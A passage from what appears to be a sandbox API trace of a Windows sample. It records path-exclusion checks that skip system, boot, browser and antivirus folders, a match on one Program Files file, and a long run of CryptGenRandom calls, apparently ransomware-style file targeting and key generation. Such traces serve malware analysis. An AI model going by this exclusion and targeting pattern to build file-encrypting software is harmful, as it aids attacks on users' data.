(pszFile="main.xml", pszSpec="*AppData*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\winrar\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\java\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\windows\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\ESET\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\AVG\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*Atheros*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*Realtek*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*bootmgr*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*boot*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*boot*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*IO.SYS*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*ntldr*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*chrome*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*opera*") returned 0 [0155.279] PathMatchSpecW (pszFile="main.xml", pszSpec="*firefox*") returned 0 [0155.279] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", pszSpec="*") returned 1 [0155.279] strlen (_Str="NMoreira") returned 0x8 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 